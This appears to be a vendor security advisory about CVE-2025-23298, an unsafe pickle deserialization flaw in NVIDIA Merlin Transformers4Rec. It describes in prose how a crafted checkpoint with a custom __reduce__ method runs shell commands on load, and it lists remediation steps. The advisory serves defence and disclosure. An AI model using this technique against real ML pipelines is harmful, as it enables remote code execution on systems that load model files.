NVIDIA Merlin Flaw Enables Remote Code Execution as Root

September 25, 2025

Severity

High

Analysis Summary

A critical vulnerability (CVE-2025-23298) was discovered in NVIDIA’s Merlin Transformers4Rec library, allowing unauthenticated attackers to achieve remote code execution (RCE) with root privileges. The flaw stems from unsafe deserialization in the load_model_trainer_states_from_checkpoint function, which relies on PyTorch’s torch.load() without safety parameters. Since torch.load() internally uses Python’s pickle module; attackers can craft malicious checkpoint files containing arbitrary code that executes when loaded, posing a severe risk in machine learning (ML) environments where checkpoints are frequently exchanged.

The attack is enabled by the library’s use of cloudpickle to load model classes directly. By defining a custom __reduce__ method in a malicious checkpoint, attackers can execute arbitrary system commands, such as fetching and running remote scripts. This grants them full control of the deserialization process. The danger is amplified because ML practitioners often download pre-trained models from public repositories or cloud sources, and production ML pipelines typically operate with elevated privileges, enabling potential escalation to root-level access.

Researchers demonstrated the flaw by embedding shell commands in a crafted checkpoint, which executed immediately upon loading before any model weights were restored. NVIDIA addressed the issue in pull request #802 by introducing a safer custom load() function that restricts deserialization to approved classes and enforces input validation within serialization.py. Additionally, developers are advised to set weights_only=True when using torch.load() to mitigate exposure to untrusted pickle objects.

The vulnerability affects Merlin Transformers4Rec versions ≤ v1.5.0 and carries a CVSS 3.1 score of (Critical). To reduce risks, organizations are urged to avoid pickle for untrusted data, adopt safer formats such as Safetensors or ONNX, enforce cryptographic signing of model files, and sandbox deserialization processes. More broadly, the ML/AI community must shift toward security-first design principles and phase out pickle-based mechanisms entirely, as their inherent insecurity guarantees that similar RCE vulnerabilities will continue to surface.

Impact

Privilege Escalation
Code Execution
Gain Access

Indicators of Compromise

CVE

CVE-2025-23298

Affected Vendors

NVIDIA

Affected Products

NVIDIA Merlin Transformers4Rec

Remediation

Update to the patched version of NVIDIA Merlin Transformers4Rec (v1.5.1 or later) that replaces unsafe pickle deserialization with a custom load() function.
Always use weights_only=True when calling torch.load() to restrict deserialization to tensor data and prevent execution of arbitrary objects.
Avoid using Python’s pickle or cloudpickle for untrusted or third-party checkpoint files.
Prefer safer model formats such as Safetensors or ONNX for storing and sharing model checkpoints.
Enforce cryptographic signing and verification of model files before loading them in production ML environments.
Run ML pipelines and model-serving processes with least privilege (non-root accounts) to reduce the impact of potential exploits.
Sandbox deserialization operations to isolate potentially unsafe code execution from critical systems.
Incorporate ML frameworks and model pipelines into regular security audits and supply chain risk assessments.
Establish policies that mandate a zero-trust approach to external model files and third-party ML artifacts.

Rewterz Annual Threat Intelligence Report 2024 - Download Now

Rewterz Annual Threat Intelligence Report 2024 - Download Now

Platform

Managed Security Services

Managed Penetration Testing

Assess

Transform

Train

Respond

Resources

NVIDIA Merlin Flaw Enables Remote Code Execution as Root

Up to 2 Million Cisco Devices Hit by Actively Exploited Zero-Day

Chrome Flaws Enable Data Theft and Crashes

Threat Insights

About Us

Our Leadership

CSR

Connect with Us